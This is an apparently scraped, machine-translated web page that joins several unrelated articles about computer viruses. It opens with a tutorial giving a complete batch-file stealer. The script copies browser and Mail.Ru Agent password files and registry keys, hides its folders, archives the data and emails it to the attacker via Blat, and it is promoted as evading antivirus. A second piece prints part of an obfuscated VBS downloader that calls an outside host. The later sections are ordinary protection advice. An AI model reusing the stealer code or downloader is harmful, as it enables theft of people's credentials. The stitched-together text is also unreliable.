Viruses can steal passwords from your PC. Computer viruses. Types, types, ways of infection. Reminder! We must not forget

In this article I will describe how quickly and without much difficulty, write and make a virus that steals files with passwords and sends it all to the mailbox.
Let's start with the fact that the virus will be written in bat "e (CMD, you can take the basic commands) that is, in the usual text file and will be executed using the standard, built-in Windows interpreter - "command line".
In order to write such a virus, you need to know the exact storage location of those files that it will steal, Blat components that can be downloaded from the off site http://www.blat.net/ or from our server, as well as a component from the WinRaR archiver Rar.exe (you can do without it).
Open notepad and copy the following code into it:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozill a\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\ rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot %\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat. exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls

I won’t write a lot of the code of the Batinka itself.
@echo off - hides the body of the butt (so it's not needed, but still)
md %systemroot%\wincs - creates a wincs folder in the system Windows folder no matter what drive it's installed on or what it's called.
md %SystemDrive%\pass\ - creates a pass folder on the drive where Windows is installed.
md %SystemDrive%\pass\opera\ - creates the opera folder where wand.dat and cookies4.dat from Opera browser(up to 11* versions, opera stores its passwords in the wand.dat file)
md %SystemDrive%\pass\Mozilla\- creates a Mozilla folder where files from the Mozilla browser will be copied (cookies.sqlite ,key3.db ,signons.sqlite ) in which passwords are stored.
md %SystemDrive%\pass\MailAgent\- creates a MailAgent folder into which files containing the history of correspondence and registry keys (storing passwords) from the Mail Agent will be copied.
md %SystemDrive%\pass\MailAgent\reg- creates a folder reg
attrib %systemroot%\wincs +h +s +r- puts attributes on the wincs folder, thereby hiding it from view.
attrib %SystemDrive%\pass +h +s +r- the same as above.
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- copies the blat.exe file from the download location to the wincs folder
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- copies the blat.dll file from the download location to the wincs folder
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- copies the blat.lib file from the download location to the wincs folder
CD /D %APPDATA%\Opera\Opera\ - goes to the opera folder where files with passwords (and not only) from the opera are located.
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat- copies the wand.dat file to the opera folder
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- copies the cookie4.dat file to the opera folder
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- exports the magent_logins2 registry key where the password is stored to the reg folder
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- exports the magent_logins3 registry key where the password is stored to the reg folder
CD / D %APPDATA% - go to the AppData folder
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- copies the contents of the Mra\Base folder to the MailAgent folder
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- copies the ver.txt file to the MailAgent folder
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- go to the folder with the Mozilla browser profile
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- copies the cookies.sqlite file to the Mozilla folder
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db- copies key3.db file to Mozilla folder
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- copies the signons.sqlite file to the Mozilla folder
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- copies the WinRar Rar.exe archiver component to the pass folder
del /s /q %SystemRoot%\Rar.exe- removes the archiver component from the Windows folder
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- archive the contents of the pass folder
copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar copy the created archive to the wincs folder
cd %systemroot%\wincs - go to the wincs folder
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password - prepares the Blat program for sending the archive, specifying data for authorization and sending a letter. Do not forget to specify your data from mailbox, from where the letter with the archive will be sent.
ren *.rar pass.rar - just in case the archive did not take the wrong name during the process, we will rename it to pass.rar again
%systemroot%\wincs\blat.exe -body Files Password -to [email protected] -attach %systemroot%\wincs\pass.rar- indicate to which postal address the letter will be sent and send it.
rmdir /s /q %SystemDrive%\pass- delete the pass folder
rmdir /s /q %systemroot%\wincs- delete wincs folder
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- remove the Blat components from the Windows folder.
del /s /q %systemroot%\blat.lib- remove the Blat components from the Windows folder.
attrib +a +s +h +r %systemroot%\wind.exe- we put attributes on ourselves, thereby hiding ourselves from the eyes.
EXIT - complete the batink process and exit.
cls - clear the output of any lines in the intraperator.
We copied it, saved it as wind.bat and compiled it into exe using the Bat to exe converter program, then we put everything together, that is, we take the Blat program components and the WinRar archiver component (you can download it) and glue it into one executable file, or with which any program, the path to unload all files must be %SystemRoot% or %WindowsDir% or %windir% .
As a result, we get a virus that will not be fired by antiviruses and will send an archive with files to your mail. The files that come to the mail can be decrypted using multi-password-recovery, though not all, but only wand.dat from the opera and then if it was not updated to 11 * versions. All other files can be decrypted by replacing them with your own.
I think this is the end of it, if you have any questions feel free to ask.
Thank you for your attention, all the best!
©Swap TheHackWorld.in

Since childhood, I have been tormented by the question: "How does a computer become infected with viruses." Finally I found out, felt for myself. Why not tell the world about how this very entertaining process actually takes place.

In order not to write a manual on infection, otherwise a lot of people will take advantage, God forbid, so I will delete some pieces of scripts.

Everyone is probably fed up with the phrases about the "leakiness" of MS Windows, but, nevertheless, it remains the most common system on planet Earth. Or maybe the system is so full of holes because of its prevalence.

And now, the attack was carried out on one of the vulnerabilities of the Windows XP system, namely the Windows Help Center.

The beginning, as usual, was a long time ago (already in 2010), you can read about this on the very well-known resource xakep.ru (at the very bottom of the page).

It all started simply.

IE issued a request to open the program, from the tjyre .info resource. Clearly a virus! But it's interesting!!

Go to site http://tjyre.info does not give any information, except that the site is under development (at the time of posting the post, it just doesn’t work, apparently they screwed it up).

How do I find out what was meant for me on the computer? Elementary - you need to consider where the link leads.

hcp://services/search?query=anything&topic=hcp://system/sysinfo/sysinfomain.htm%A%%A%%A%%A%%A%%A%%A%%A%%A% %A ... %%A%%A%%A..%5C..%5Csysinfomain.htm%u003fsvr=

As my ignorance tells me, the link to the virus file is hidden behind the numbers.

Through simple transformations, it turns out that copying to system folder my computer's script with the file name l .vbs , and its subsequent execution.

The address where the script is located on the network:

http://tjyre.info/games/hcp_vbs.php?f=17

The file that opens contains the following text:

« w=3000:x=200:y=1:z=false:a = " http://tjyre.info/u.php?e=7&f=17":Set e = Createobject(StrReverse("tcejbOmetsySeliF.gnitpircS")):Set f=e.GetSpecialFolder(2):b = f & "\exe.ex2":b=Replace(b,Month("2010-02 -16"),"e"):OT = "GET":Set c = CreateObject(StrReverse("PTTHLMX.2LMXSM")):Set d = CreateObject(StrReverse("maertS.BDODA")) … Removed for stupid reasons...g =o.GetFile(b ):g.Delete»

The text is quite simple:

we see the date 02/16/2010 (it turns out that some masking of the virus by date is being carried out, all the same they adopted it that it is necessary to mask)

we see the commands turned inside out (with the help of a reverse), with the help of which the virus file flies onto our computer.

Safely sit down fresh readme.exe. What does this guest bring us? Probably a lot of fun.

Run readme . exe was very successfully blocked by the program antiwinlocker . For which she is honored and praised. But since I still want to see what happens, the defenders will have to be asked to retire for a while.

The first launch of the virus was not remarkable, which is understandable, the virus penetrated and hid until the next boot.

We reboot and again silence. Mystery!!

We'll have to look in secret corners.

We find in the folder "C:\Documents and Settings\Admin\Application Data" the file lsass.exe (simulating the system process).

In the registry, respectively, we find the key:

"userinit"="C:\\WINDOWS\\system32\\userinit.exe,C:\\Documents and Settings\\Admin\\Application Data\\lsass.exe" as expected.

But that's not all!

In the folder "C:\WINDOWS\system32\drivers\etc" there is a magic host file, in which the virus adds about a dozen magic lines (please view the ENTIRE hosts file):

These lines are used to redirect Odnoklassniki and vkontakte sites to a very specific site, as well as a complete bummer to Kaspersky updates (the virus is similar to Trojan.Win32.Ddox.ci).

What do we see when we go to the villain's website? We see home page classmates, but if you enter a username and password, they will go straight to the "villain". And if you click on some link, you get a very cool request for "account validation". And the text clearly states: The service is not available to subscribers in some regions of MegaFon Such a serious approach to business that I did not immediately enter into the meaning of the phrase.

In order not to become a victim, you need to keep the Internet safe and direct the necessary efforts to protect your computer!

In this article, or rather, the instructions will be expressed, I, Vladimir Belev (formerly an employee of the Moscow Instrument-Making College as a technician, engineer and teacher), will tell you about 3 simple possible options for protecting a computer by an ordinary user and will answer as far as possible to all your questions in the comments at the end of the article.

When you know where to lay the feather bed, it is better to lay it!

Quick navigation through the article

Introduction

When surfing the Internet from a computer, you may encounter such phenomena as computer infection with various malicious programs, which can lead to completely different consequences, from file damage and disruption of the normal, stable operation of the operating system, to complete system failure and even theft important personal data!

And even, in addition to directly infecting a computer, you can simply become a victim of scammers who can steal your very important data, such as logins and passwords from various sites, as well as information about your bank cards ah and any other information, the loss of which may result in sudden write-offs Money your accounts.

Therefore, when working on the Internet, you need to be, firstly, extremely careful, try not to visit suspicious and dangerous sites, and also apply protection tools for your computer.

Below I will show and tell you what options you have to protect yourself from different kind threats while browsing the Internet from your computer…

Option number 1. Apply simple antivirus protection (when using Windows)

This is perhaps the most relevant, simple and common method of protecting your computer from various threats on the Internet, including some configurations of anti-virus products, I also have in my arsenal the protection of your personal data and additional protection when making payments online.

Antiviruses, as well as various antispyware, antitrojans and other utilities from the same category, can be paid and free and, of course, they are developed by different manufacturers. In my own skin, I experienced both of them, and with the growth of experience, with practice and various experiments, I came to the unequivocal conclusion that free antiviruses can fully provide decent protection for your computer.

And when to choose a paid and when a free antivirus? My answer is that it's easier to use free ones.

Paid antiviruses differ for the most part only in the presence of a large number additional functionality, for example, a secure storage for passwords, a built-in program for cleaning a computer, a browser, for updating installed on a computer software. Additional protection elements can also be built in there, such as a firewall, which protects your computer from various hacker attacks and, in general, allows you to block access to the Internet for certain programs and according to certain rules.

But all this, if required, can be found separately in free options, and I think there is simply no need to pay for it.

To date, I have settled on the free Avast antivirus, which I have been using for more than 4 years in a row.

During these 4 years, I have never picked up any serious infection from the Internet, which would even lead to petty problems in the operation of my system and the programs installed on it. Of course, all this is not without taking into account such a simple thing as a generally careful “walk” through the sites, without clicking on links in suspicious emails, without entering various data on suspicious and untrusted sites, in general, without visiting sites that do not at all inspire trust!

Below I will show you how to install and configure the free version of Avast antivirus to work with a high degree of protection.

In modern versions Windows already there is also regular protection against viruses, which is called “ Windows Defender”, however, for greater security, especially for novice users, I would still recommend using a third-party antivirus (when installing it, the standard protection will turn off by itself).

Installing an antivirus

You can download the antivirus from the official website at the link:

On the page, click the “Download free antivirus” button (it may be called a little differently).

If this does not happen, you may be redirected to another page where you will need to confirm the download or select the version of the antivirus (free or paid).

Run the downloaded file to start the installation.

Do not immediately click the install button, but click “Settings”!

Now you need to select the antivirus components that will be installed.

In the image below, circled in yellow are the most important and mandatory components of the antivirus that will directly protect your computer (check files on your computer, files downloaded from the Internet, mail, and analyze behavior in the system for suspicious actions in real time). Don't uncheck these boxes!

Everything else can be set as in the same image above. I would recommend just such a set of components, because some of the rest are useless, and the other part will not work in free version antivirus. Or you can disable something that you consider unnecessary for yourself.

You can read what component is used for what by hovering the mouse over the question mark next to the desired component.

Click "Install".

After the installation is completed, click “Continue” several times in different windows.

In the last window after installation, you will be prompted to install the antivirus on your Android smartphone or tablet. You can always do this directly from the device itself, or you can install it right away, through this window.

To opt out, click "No, I don't want to" below.

Remember that any antivirus, especially on a smartphone, is an additional load on it (it may start to slow down the device), and the battery discharge rate also increases! From my experience, I’ll say that it’s not so easy to catch a virus on Android, much more difficult than on Windows, if you don’t visit dangerous sites and for all the time you use smartphones with Android OS, I have never been infected, leading to a breakdown or instability devices.

This completes the installation!

Free License Activation

After installing the antivirus, it is better to immediately activate your free license, because after 30 days the antivirus may start signaling you about the expiration date. Annoying warnings will appear and soon the antivirus may turn off altogether. However, activation is a matter of minutes and a subscription is given immediately for a year, after which it can be extended again for a year and so on ad infinitum.

Open the main window of the antivirus and click "Activate".

Click "Select" under the column "Avast Free Antivirus” (free protection).

In the next window, refuse to install trial version paid protection:

That's all activation. If the activation period is about to expire, the program will warn you and you will just need to repeat the procedure.

Antivirus settings

In order for the antivirus to reliably do its job, as well as to disable various unnecessary “chips”, I recommend making some settings.

Open "Settings" from the main window of the antivirus.

Program settings

This is to prevent possible “smart” malware from starting to disable your antivirus or manage its settings on its own.

Go to the "Password" subsection, enable the "Protect Avast with a password" function and set any password. Even the simplest will do. And you can set the settings for protected areas directly as in the image below:

Security settings

Open the “Components” tab and here you can configure each protection component separately.

The settings that are set initially can be left as they are, with them the antivirus does not “load” the system much and at the same time protects well. I recommend changing only the sensitivity level by setting it to “High” (initially it is “normal”). To do this, open the settings of each component one by one and in the “Sensitivity” tab, set “High”. Don't forget to save your changes!

It can also come in handy in the settings!

Scanning for viruses

No matter how good the antivirus is and no matter how it is configured correctly, there is always a chance to miss something on the computer. Therefore, you need to regularly (once a month, for example) conduct full scan your computer for threats to keep your system in good condition and more secure.

To scan your computer Avast antivirus, go to the "Protection" section and select "Antivirus".

Before running a full computer scan, I recommend that you configure this type of scan a bit. To do this, click on the gear in the corner of the block with this type of scan.

In the “Scanning” - “File types” section, check the “Scan all files” checkbox so that the scan is as thorough as possible (but will take longer).

In the “Sensitivity” section, set the sensitivity to high and enable the “Scan entire files” option.

In the "Archivers" section, check "All archivers".

Option number 2. Work fully or partially through a virtual machine (when using Windows)

This protection method is as follows. A special program is installed on your computer, through which you install a new operating system (whatever you want) and can work in it while being in your real system.

This operating system, which will work for you through special program and eat virtual machine, i.e. as a virtual computer.

What does it give? A virtual machine is a separate environment from your real system, and if viruses get there, they will remain there without causing any harm to your real system.

A virtual machine (called a “virtual machine”) requires good performance from your computer. Simply put, the computer must be powerful! Of course, a lot also depends on the system that you will install as a virtual machine, because, for example, Windows XP requires several times less computer resources than modern Windows 10. If the computer is weak, not only will you not be able to work normally in a virtual machine, so your real system may slow down and not cope with some routine tasks.

What kind of computer do you need to have to work with a virtual machine? Sometimes it's easier to just take it and check it out. Those. install a virtual machine, allocate the required amount for it random access memory and see if it is normal to work in it or uncomfortable. The processor is better to have from the Core i line or similar from AMD. RAM from 4 GB, because even already old windows 7 requires 2 GB for normal operation. memory. Accordingly, if you have a total of less than 4 GB on your computer. RAM, you can forget about the virtual machine).

Based on the above, you can use a virtual machine in 2 options:

Perform most of your actions in it, i.e. “walk” on the Internet, download something.

Perform only certain actions in the virtual machine, for example, visit sites that you are not sure about, download files that you are not sure about, or install all sorts of unknown programs.

I would not use the first method, since it is simply inconvenient to spend most of the time in a virtual machine. And secondly, for comfortable work in a virtual machine (to just like in a conventional system), you need a very powerful computer and this is without taking into account the fact that some tasks can be performed in parallel in a real system.

Installing VMware Workstation Player to create and work with virtual machines

VMware Workstation Player software for working with virtual machines, will only run on computers with 64-bit version of Windows! Now, in the vast majority of cases, this version of Windows is installed on computers. In any case, you can just try to install.

You can download the program from the official website by clicking on the link:

On the page that opens, click the “Download” button next to the version for Windows (for Windows 64-bit Operating Systems) and the program will be downloaded to your computer.

After the installation file has downloaded, run it.

In the first installation window, click Next.

At one of the installation steps, check the box “Enhanced Keybourd Driver” and click “Next”:

Enabling this option means that the extended keyboard driver will be installed for virtual machines and it is better to install it just in case.

In one of the installation windows, uncheck the "Help Improve VMWare Workstation 12 Player" option, and leave the first option enabled:

The first option means that the program will automatically check for updates and if there are a new version, then you can immediately upgrade to it. The second option is to help the developers of the program by sending anonymous information about the operation of this program from your computer.

Everything, the installation is complete.

Now run the program and you will see the following window:

Here you need to select the first item, as in the image above and enter your E-Mail address. This is only necessary so that you can use the program for free. After entering your E-Mail, click "Continue".

In the next window, click "Finish":

The program window will open.

Create a virtual machine

Now in the main window of the program, click "Create a New Virtual Machine" to create a new virtual machine:

So we have reached the stage where you need to choose from where, from which file or disk the operating system will be installed as a virtual one. There will be 2 options in the window: install from a CD / DVD disc (Installer disc) or install from an image file stored on your computer (Installer disc image file). Choose the first option if you have your own CD / DVD disk with an OS that you want to install as a virtual one:

For example, you have a disk with Windows 7 and want to install this system as a virtual one. Then insert the disk with this system into the computer and choose the first option.

But operating systems for installation can also be stored in special file on your computer, which is called "image". Then you can install the operating system as a virtual machine directly from this file. Here is an example of an image file from the operating Windows system XP:

VMWare Workstation Player supports ".ISO" image files, so if you have an iso image with the operating system, then it is easiest to install a virtual machine from it. And then choose the second option in the current window:

Using the "Browse" button, you can select just the desired image file with the operating system.

After choosing the option you want, click the "Next" button below.

Any operating system can be installed as a virtual one; any Windows system, any Linux or any other!

I recommend installing Windows 7, because, for example, the oldest Windows XP is no longer supported and many programs may not work correctly in it, and many will not work at all. And newer ones (Windows 8 and 10) require more performance from your computer to work properly.

In the next window, we are prompted to specify in advance the key for installing the operating system, specify the username and password:

After all, installing an operating system in a virtual machine will be no different from installing a real OS on your computer. The only difference is that the system will be installed in the window virtually, and not on your real HDD. But in that window, I recommend leaving only the username, which is likely to be set automatically (taken from your real OS). The key and other parameters, if necessary, are easier to specify already during the installation of the OS. Therefore, in that window, just click "Next" to continue.

You will probably see a warning window that you didn't specify a key. Click "Yes":

In the next window, in the first field, you need to specify the name of the virtual machine that you are creating, and in the second field, the location of the virtual machine files on your computer.

You can call it whatever you like, usually they call it the name of the OS that you will install. The main thing is that you yourself understand where your OS is, if you suddenly install and work with several virtual OS in the future. Those. don’t call it like this: “1234”, because then you yourself won’t understand what kind of virtual machine you have with that name until you start it.

You can choose any location for the virtual machine on your computer, i.e. any folder or drive in your real system. It is in the selected folder that the files (there will be many) that are responsible for starting the virtual machine will be located.

Please note that the virtual machine will take up a lot of space! Depends on the system being installed.

When you specify the name and location, click "Next".

In the next window, you need to specify the volume of your hard drive, which will be allocated for the work of the created virtual machine. This is a very important step!

As I said, a virtual machine is practically no different from your real OS. She will also have her own hard drive only virtual.

And the volume of the hard disk of the virtual OS will be equal to the volume of your real hard disk that you allocate for the virtual machine.

Everything here will depend on which operating system you install as a virtual one. If, for example, Windows XP, then it does not require a lot of hard disk space and about 10-15 GB is enough for it.

But modern Windows OS: 7, 8, 10 require a decent amount of space for their work. free space on the disk, at least 30 GB, and better - more (depending on what the virtual machine will be used for).

And in the first field of the current window, you need to specify how much of your real hard disk you will allocate for the created virtual machine.

I, as I already said, for example, I will install a trial 30-day Windows version xp. For this system, 15 GB will be enough. virtual disk size.

Please note that your real hard drive should have at least as much free space as you allocate for the virtual machine!

By checking that option, we indicated that it is not necessary to divide the virtual hard disk on which the virtual OS will run on several files, let it be in one file. If we chose the second option "Split virtual disk into multiple files", then the virtual hard disk would be divided into several files.

In the next window, you will receive information about the settings of the created virtual machine. We can click “Finish” right now to start the installation of the virtual machine, but we will not do this now.

Let's move on to additional settings virtual machine to understand another extremely important setting and click the "Customize Hardware" button for this:

An additional window will open with settings on several tabs. We are only interested in the “Memory” tab, which sets the amount of RAM allocated to the virtual machine on your computer.

In this window, you need to specify the amount of your real RAM that will be allocated for the operation of the virtual machine.

Everything again depends on what operating system you will install. If this is Windows XP, then it will be able to work with only 128 MB of memory, though it will slow down a lot.

It is better for her to allocate 1-2 GB. RAM. If you install Windows 7, 8 or 10 as a virtual machine, then I recommend allocating at least 2 GB. random access memory.

But there is one more point. If your computer already has little RAM, then you cannot allocate much for virtual system!

If the computer has only 2 GB of memory (such a computer is very weak today), then you are unlikely to allocate more than 512 MB (megabytes) of memory for the virtual machine, because if you allocate more, your main system may start to slow down hard. Consider this!

In general, if your computer is weak, it's easier not to bother with virtual machines.

You will return to the window with information about setting up your virtual machine and it's time to proceed directly to installing the virtual machine!

Check that the "Power on this virtual machine after creation" checkbox is checked so that the installation starts immediately and click "Finish":

The installation of the virtual OS you configured will start. First, windows will appear notifying you that some of your real computer hardware is connected to the virtual machine, as well as windows with various non-essential information. Just check the box "Do not show this hint again" in these windows and click "OK":

Well, then the installation of the virtual OS will go directly. On the Windows XP example, it looks like this:

Installing a system as a virtual machine does not differ from the actual process of installing this system on a computer.

After installing the operating system as a virtual one, it will start immediately. It all looks something like this (i.e. the operating system in the VMWare program window):

Immediately after starting the system, the installation will automatically start in it. additional tools. This is necessary primarily so that you can easily drag and drop files from the real system into the virtual OS window or vice versa, and also be able to freely resize the window with the virtual machine.

Important nuances for working with virtual machines

Option number 3. Use for work (permanently) one of the operating systems Linux or MacOS

In addition to the most popular Windows operating systems in the world, there are analogues. The most popular analogues are Linux and MacOS systems.

Linux is a free operating system that anyone can freely download from the Internet and install on their computer.

MacOS is the factory operating system on all Apple computers (Macbook).

One very important feature unites both of these systems - they are much safer than the usual Windows. That is why I attributed the work in these systems to the 3rd option for safe work on a computer.

Working on Linux or MacOS, you don't even have to use antiviruses! There is definitely a risk of infection, but it is minimal compared to Windows, especially since the vast majority of various viruses, trojans and other threats are developed for Windows computers, and if these files get on Linux or MacOS, they will simply be harmless.

Should I switch to Linux or stay on Windows?

It's up to you to decide! But I can say that these are fundamentally different systems, similar to Windows only in some features and nothing more. They have a completely different interface; a lot of other programs that are not in Windows and are in these systems (and vice versa); for some programs you will have to look for analogues (for example, for Linux there is no Adobe Photoshop); in general, they are completely different in structure of the system.

Therefore, if you are a beginner, with a computer not quite on “You”, but have already adapted to working in Windows, then a full transition to Linux or MacOS can be a real problem for you. For experienced users, but who have been working only on Windows for many years, the transition to Linux by no means can do without nuances, a lot of questions and misunderstanding of some things.

In this case, it is probably easier for you to work on Windows, applying the security measures described in this manual. Moreover, Linux and MacOS will not be fully protected against theft of personal data, such as passwords from sites, bank card and account data, even taking into account their security from virus threats.

Because the users themselves are to blame for the theft of data, because of their inexperience, inattention, since it is enough to accidentally enter a non-fake site, enter a login and password there (thinking that you are entering the familiar site you need) and that’s it, the attackers have the data! This is just one example of how data can be stolen due to user carelessness.

Reminder! We must not forget

It is important to know that no matter what means of protection you use when working on a computer to protect yourself from viruses that break the system and personal data, from theft of important data, from hacking and everything else, you will not be able to ensure 100% safe browsing on the Internet, if you put yourself at risk on your own, due to inexperience, ignorance, inattention.

The simplest example. Someone on the internet asked you to reset your password. Email and you, trusting the person, send. Then this person disposes of your mail as he pleases, he wants to delete all letters or do nasty things on your behalf. What will the protection that you use to work on the Internet do in this case? Nothing at all!

Whether it's the most advanced antivirus, a virtual machine, or working in a secure Linux system or another system. All this will not help in any way, because in this case you yourself transferred your data to the attacker and this happens all the time, as a rule, due to excessive trust, due to inexperience and inattention of users.

I will give an example of user inattention, which leads to the theft of personal data.

Suppose you want to login to your account social network In contact with. It seems to go to the site of this social network as usual, but you don’t even pay attention to the fact that the address of the site is slightly different from the real one.

The original address of this social network is vk.com, and you got to the site vc.com, which, for example, has exactly the same design as the VKontakte site.

So, by going to this fake, fraudulent site, you pay no attention to anything, enter your username and password to enter your account. And then oops! Your data, namely your login and password, will already be in the hands of attackers! And all why? Simple inattention, probably inexperience. In this case, again, no means of protection will help. Antivirus, of course, can warn about a phishing site, but not always, because this fake site could have appeared the other day and simply did not get into the database yet.

And there are many such examples...

Therefore, walking on the Internet, always be on the lookout, attentive and careful. Here are some recommendations.

In fact treat viruses, this is not a very complicated operation to pay specialists a lot of money for this work. Protect your computer from viruses, or in case of infection, return the computer to a “healthy” state by deleting malware, you can do it yourself by choosing a good antivirus program and following some rules. Take at least two of the most important ones: First, regularly update the antivirus databases. The second is to completely scan your computer for viruses once a month.

So, with this, I think it is clear that malware removal is carried out with the help of antiviruses. They are paid and free, I talked about free methods in the following article:

And now about what is a malicious program or in another way a virus?

Computer virus or malware- this is a program whose main purpose is: harming a computer, damaging user data, stealing or deleting personal information, degrading computer performance, and much more.

To date malware can be classified into several types according to their impact on the computer.

• classic viruses.
• Trojan programs.
• Spies.
• Rootkits.
• adware.

Let's take a closer look at each type of malware.

Classic viruses are malicious programs that can infect a computer, for example, via the Internet. And the essence of such viruses lies in self-replication. Such viruses copy themselves, copy files and folders that are on the infected computer. They do this in order to infect the data so that in the future their recovery would be impossible. This virus tries to damage all data on the computer by putting its code into all files, from system files to the user's personal data. Most often, salvation, on such an infected computer, is.

Trojan is a serious type of virus. Trojans are written by attackers for a specific purpose, for example, stealing information from computers, or stealing passwords, and so on.

The Trojan is divided into two parts. The first part, called the Server, is stored by the attacker, and the second, the Client part, is distributed to all possible corners of the Internet and in other places. If the client part of the malicious program gets on a computer, then this PC becomes infected and the Trojan begins to send various information to the attacker in disguise on its server.

Also, the Trojan can perform various operations on the computer at the request of the server (intruder), steal passwords, infect documents and files with malicious code.

spies are somewhat similar to Trojans. But they have the main difference and it lies in the fact that spies do not harm the system and user files. Spyware quietly settle down on the computer and spy. They can steal passwords or even save absolutely everything that you enter from the keyboard.

Spyware is the most intelligent type of virus and can even send files from an infected computer. The spy knows a lot of information about the infected PC: what system is installed, what antivirus you use, what browser you use on the Internet, what programs are installed on the computer, and so on. Spyware is one of the most dangerous malware.

rootkits They are not viruses in and of themselves. But rootkits are programs whose purpose is to hide the existence of other viruses on the computer. For example, a computer was infected with a spy virus at the same time as a rootkit. And the rootkit will try to hide, from your antivirus and operating system, a spy. Accordingly, the presence of rootkits on a computer is no less dangerous, since they can work quite well and hide a bunch of viruses (spyware, trojans) from the eyes of our antivirus for a long time!

Adware is another type of malware. This is a less dangerous program, and its essence is to run ads on your computer. in every possible way in various places. Adware does not cause any harm and does not infect or corrupt files. But you also need to protect yourself from this type of virus.

These are the types malware exist. To protect your computer from viruses, we need good antivirus. I talked about that in another article, and now we will continue the topic of describing viruses and protection schemes for our computer.

Previously, viruses did not have any specific purpose, they were written for the interest and the developer did not set a specific goal. Now viruses are the most complex algorithms, the essence of which is most often the theft of money and data. Trojans, most often, are designed only to steal passwords and other important data.

By the way, whether your computer was attacked by viruses can be distinguished by some signs:

• Programs do not work properly or stop working altogether.
• The computer began to slow down, work slowly.
• Some files get corrupted, refuse to open.

Very often, these symptoms can become a sign of a computer virus infection but fortunately not always.

It should be noted that most often one particular virus can infect different types files. Therefore, even after curing the computer from a strong virus attack, partition formatting will be the most correct.

To protect yourself from viruses, as I said above, they will help you antivirus programs. Today, antivirus programs have features that are enough to reflect almost all malicious programs that are distributed on the Internet. But for maximum virus protection important role a properly selected and configured anti-virus program plays for full “combat” performance. I recommend that you read the article about. But if you do not have time, then I will name you the best antivirus programs right here. As of today, these are:

• Kaspersky
• Avast
• Dr. Web
• NOD32

I think there are plenty to choose from.

Good luck and excellent virus protection to you.

Hello again.
The topic of today's article. Types of computer viruses, principles of their work, ways of infection with computer viruses.

What are computer viruses anyway.

A computer virus is a specially written program or assembly of algorithms that is written for the purpose of: making a joke, harming someone's computer, gaining access to your computer, intercepting passwords or extorting money. Viruses can self-copy and infect your programs and files with malicious code, as well as boot sectors.

Types of malware.

Malicious programs can be divided into two main types.
Viruses and worms.

Viruses- spread through malicious file, which you could download on the Internet, or it may turn out to be on a pirated disk, or they are often transferred via Skype under the guise of useful programs (I noticed that schoolchildren often come across the latter, they are allegedly given a mod for a game or cheats, but in fact it may turn out to be a virus that can hurt).
The virus introduces its code to one of the programs, or is masked by a separate program in the place where users usually do not go (folders with the operating system, hidden system folders).
The virus cannot start itself unless you run the infected program yourself.
Worms already infect a lot of files on your computer, for example, all .exe file s, system files, boot sectors, etc.
Worms most often penetrate the system on their own, using vulnerabilities in your OS, your browser, or a certain program.
They can penetrate through chats, communication programs such as skype, icq, can be distributed via e-mail.
They can also be on sites, and using the vulnerability of your browser to penetrate your system.
The worms can spread local network, if one of the computers on the network is infected, it can spread to other computers, infecting all files in its path.
